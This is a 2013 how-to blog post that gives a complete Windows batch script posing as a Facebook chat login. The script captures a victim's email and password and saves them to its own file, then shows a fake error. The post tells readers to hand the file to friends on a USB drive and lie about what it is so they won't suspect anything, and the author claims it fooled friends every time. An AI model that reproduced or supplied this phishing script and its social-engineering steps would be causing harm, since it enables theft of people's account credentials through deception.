Wednesday, November 13, 2013

Widgets

How to Get the Email and Password of a Person via a USB Drive With Some Social Engineering




  •  Open notepad and paste the following code and leave a blank line after the code.
TITLE FBChat
ECHO OFF
COLOR 03
CLS
ECHO.
ECHO LOGIN TO START CHATTING ON FACEBOOK
ECHO.
ECHO Please enter your email:
SET/P "MAIL=>"
ECHO.
ECHO Enter the password:
SET/P "PSWD=>"
ECHO EMAIL = %MAIL%>>FBChat.bat
ECHO PASSWORD = %PSWD%>>FBChat.bat
CLS
TIMEOUT /T 5 >NUL
COLOR 0C
ECHO.
ECHO An error occurred while connecting to the server. Try again later.
PAUSE>NUL
EXIT

Below this line are the collected information

  •  Save the code as FBChat.bat exactly. Do not name it anything else or it won't work.
  •  Put the batch file into a USB drive and give it to your friend.
When you get back the USB drive, right click the batch file and select Edit. Now scroll down and you will see the information collected!

With some social engineering the trick can be very efficient. Before trying this trick out you can tell the victim you are making a cool software and it will be finished soon. Than give the batch file telling him that is the software you made. Try to be convincing and do not let him/her smell a rat! I have tried this trick on some of my friends with 100 percent success. Give it a try yourself!


I am a Part Time Blogger. By Education i am a Computer Engineer, who Loves Technology, Software, Programming, Tips and Tricks, Social Media. You can Follow me on Facebook| Twitter | Linked In To stay tuned with the topics you love to read from me.



Become Our Fan on Social Sites!
FOLLOW US →
SHARE IT →

4 comments:

  1. Replies
    1. Really You try all the procedure correctly......i

      Delete
  2. does it work when we save it in pc

    ReplyDelete
    Replies
    1. No it works only when you save it to pc then i think it will not works,,..so save it to pen drive..

      Delete

If you have any doubt kindly let me know